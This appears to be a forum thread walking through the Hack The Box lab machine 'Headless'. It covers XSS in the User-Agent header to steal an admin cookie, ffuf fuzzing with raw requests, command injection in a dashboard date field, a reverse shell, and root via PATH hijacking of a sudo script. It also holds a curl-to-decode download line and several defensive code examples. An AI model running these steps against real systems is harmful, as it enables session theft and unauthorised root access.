Headless - Linux - Easy
Good luck everyone! Let's tackle this together!
https://app.hackthebox.com/machines/Headless
(Mar 23, 2024, 10:06 PM)andlommy Wrote: except the contact form has a check for < > in the message, so wondering how to bypass that
No need to bypass, just inject an XSS payload into the User-Agent.
result:
10.10.**.** - - [24/Mar/2024 08:05:31] "GET / HTTP/1.1" 200 -
10.10.11.8 - - [24/Mar/2024 08:05:54] code 404, message File not found
10.10.11.8 - - [24/Mar/2024 08:05:54] "GET /is_admin=ImFkbWluIg.*****************-SnXpH0 HTTP/1.1" 404 -
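Added example (my own code, not from this thread or the machine): why a "<>" check on the message field alone does not protect the admin view. The form check covers only `message`, the report also embeds request headers, so the fix is escaping every value at output time, whatever field it came from. The form, headers and report layout are constructed stand-ins.

```python
import html
import re

# Constructed sample submission: the message passes the "<>" check, but the
# User-Agent header carries markup that the admin report will embed.
SAMPLE_FORM = {"fname": "aa", "lname": "aa", "email": "tot@fr.fr",
               "phone": "aa", "message": "hello"}
SAMPLE_HEADERS = {"User-Agent": "<script>alert(1)</script>",
                  "Referer": "http://target.htb:5000/"}

FORBIDDEN = re.compile(r"[<>]")


def message_check(form):
    """The form-level check: only the message field is inspected."""
    return not FORBIDDEN.search(form.get("message", ""))


def render_report_unsafe(form, headers):
    """Pattern to avoid: form and header values concatenated into HTML as-is."""
    rows = [f"<tr><td>{k}</td><td>{v}</td></tr>"
            for k, v in {**form, **headers}.items()]
    return "<table>" + "".join(rows) + "</table>"


def render_report_safe(form, headers):
    """Context-aware output encoding: every key and value is HTML-escaped,
    so the report is safe even for fields the input check never looked at."""
    rows = [f"<tr><td>{html.escape(k)}</td><td>{html.escape(v)}</td></tr>"
            for k, v in {**form, **headers}.items()]
    return "<table>" + "".join(rows) + "</table>"


def markup_bearing_fields(form, headers):
    """Detection helper for logging: every submitted field (form or header)
    that contains markup characters, not just the message."""
    return sorted(k for k, v in {**form, **headers}.items()
                  if FORBIDDEN.search(v))
```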
Mar 24, 2024, 01:17 AM
(This post was last modified: Mar 24, 2024, 01:34 AM by jahman.)
hello,
here is my writeup.
1) In the message field, add a "<>" to fetch the anti-hacking tool. You will get a response that your browser parameters have been sent to the sysadmin.
Save the Burp request and replay it with an XSS payload wordlist to find an XSS.
xss.req file
POST /support HTTP/1.1
Host: target.htb:5000
User-Agent: FUZZ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: http://target.htb:5000
DNT: 1
Connection: close
Referer: http://target.htb:5000/
Cookie: iconSize=32x32; is_admin=XXX
Upgrade-Insecure-Requests: 1
fname=aa&lname=aa&email=tot%40fr.fr&phone=aa&message=%3C%3E%0D%0A
ffuf command (XSS-RSNAKE.txt: https://pastebin.com/bDuWJnUX; /!\ adapt it with your IP address...)
\ffuf -ic -c -of csv -request-proto http -request xss.req -w XSS-RSNAKE.txt
2) Launch a local web server and you will receive the admin cookie.
3) With the admin cookie, you will have access to a new dashboard function. Fuzz it again with Burp.
fuzz.req file:
POST /dashboard HTTP/1.1
Host: target.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://target.htb:5000
DNT: 1
Connection: close
Referer: http://target.htb:5000/
Cookie: iconSize=32x32; is_admin= THE PREVIOUS ADMIN COOKIE
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
date=2023-09-15FUZZ
ffuf command (all-attacks-unix-encoded.txt == https://rentry.co/sycg793q, a gzip + base64 encoded file; decode it with: curl https://rentry.co/sycg793q/raw | base64 -d | gunzip > all-attacks-unix-encoded.txt)
\ffuf -ic -c -of csv -request-proto http -request fuzz.req -w all-attacks-unix-encoded.txt --fs 2028 --fl 73
You will find the injection payload:
4) Adapt the previous payload to obtain a reverse shell. Then "sudo -l" will inform you that you can run the syscheck shell script with admin privileges.
5) The syscheck script has a security flaw related to PATH hijacking. Create a revshell script named initdb.sh and run "sudo /usr/bin/syscheck". Your initdb.sh will be executed as root.
--> Badaboom
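Added example (my own code, not from the thread or the machine): the defensive side of step 3. A dashboard that hands a `date` parameter to a shell command is only safe if the value is allow-list validated and passed as a single argv element rather than interpolated into a command string. The `report.sh` command and the probe strings are constructed stand-ins shaped like the "date=2023-09-15FUZZ" requests above.

```python
import re
from datetime import date

# Constructed sample inputs: the first is the shape the dashboard expects,
# the others mimic "date=2023-09-15FUZZ" style probes.
VALID_DATE = "2023-09-15"
PROBES = ["2023-09-15;id", "2023-09-15$(id)", "2023-09-15`id`",
          "2023-09-15 && id", "2023-09-15\nid", "2023-13-40"]

# \Z (not $) so a trailing newline cannot sneak past the shape check.
DATE_RE = re.compile(r"\A\d{4}-\d{2}-\d{2}\Z")
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\'\"]")


def parse_report_date(value):
    """Allow-list parse: exact YYYY-MM-DD shape and a real calendar date,
    returned normalised; anything else yields None."""
    if not DATE_RE.match(value):
        return None
    try:
        return date.fromisoformat(value).isoformat()
    except ValueError:
        return None


def build_command_unsafe(value):
    """Pattern to avoid: the raw parameter interpolated into a shell line."""
    return f"bash report.sh {value}"


def build_command_safe(value):
    """argv list for subprocess.run(..., shell=False): the value is one
    argument and was validated first, so no shell ever parses it."""
    clean = parse_report_date(value)
    if clean is None:
        raise ValueError("date must be YYYY-MM-DD")
    return ["bash", "report.sh", clean]


def rejected(value):
    """True when the hardened builder refuses the value."""
    try:
        build_command_safe(value)
    except ValueError:
        return True
    return False


def looks_like_injection(value):
    """Detection hint for request logging: shell metacharacters in a date."""
    return bool(SHELL_META.search(value))
```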
Mar 24, 2024, 02:35 AM
(This post was last modified: Mar 24, 2024, 02:36 AM by jahman.)
(Mar 24, 2024, 02:29 AM)berlik Wrote: How did you find that you need a file with this name initdb.sh?
In the syscheck script at line 19:
The "./" means the current directory. As the script does not initialize the PATH at the beginning (with a cd or something else), it will execute the initdb.sh script no matter where it is.
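Added example (my own code, not from the thread or the machine): a small audit that flags the pattern jahman describes, a command invoked by relative path inside a script that may be run via sudo, unless the script has first pinned its working directory with `cd /absolute`. The script text below is a constructed stand-in, not the real syscheck; it only reproduces the `./initdb.sh` pattern and the "Database service is running." message from the thread.

```python
import re
import shlex

# Constructed stand-in for a sudo-permitted maintenance script (not the real
# one): the helper is started by relative path on line 8.
SAMPLE_SCRIPT = """#!/bin/bash
if [ "$EUID" -ne 0 ]; then
  echo "Must be run as root"; exit 1
fi
last_modified=$(stat -c %Y /etc/passwd)
echo "Last modified: $last_modified"
if ! pgrep -x initdb.sh &>/dev/null; then
  ./initdb.sh 2>/dev/null
else
  echo "Database service is running."
fi
"""

RELATIVE_EXEC = re.compile(r"^\.{1,2}/")


def audit_relative_execs(script_text):
    """Return [(line_no, token)] for every word that is a ./ or ../ path,
    unless an earlier 'cd /absolute' pinned the working directory.
    Heuristic: comments are cut at '#', so '#' inside strings is a blind spot,
    and quoted './x' arguments will be reported too (acceptable for review)."""
    findings, pinned = [], False
    for n, line in enumerate(script_text.splitlines(), 1):
        code = line.split("#", 1)[0].strip()
        if not code:
            continue
        try:
            words = shlex.split(code)
        except ValueError:          # unbalanced quotes: fall back to whitespace
            words = code.split()
        if len(words) >= 2 and words[0] == "cd" and words[1].startswith("/"):
            pinned = True           # cwd no longer depends on the caller
        for w in words:
            if RELATIVE_EXEC.match(w) and not pinned:
                findings.append((n, w))
    return findings
```

The remediation the check encodes is either an absolute path to the helper or an explicit `cd` to a fixed directory before any relative invocation; sudo keeps the caller's working directory, so a relative path resolves wherever the invoking user happens to be.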
(Mar 24, 2024, 01:17 AM)jahman Wrote: hello, here is my writeup.
thank you so much
A quicker way to escalate privs is to cd into the /usr/bin directory and run the command ./bash -p, then just cd into the root file and cat the root.txt file.
Here is the solution, just check out the published writeup, no worries, it's free:
HTB Headless Writeup on Medium
Mar 25, 2024, 05:04 AM
(This post was last modified: Mar 25, 2024, 05:12 AM by RoyTong1988.)
sudo /usr/bin/syscheck
shows "Database service is running."
Then I cannot kill the initdb.sh process. How can I solve this?
Is the only way to reset the machine?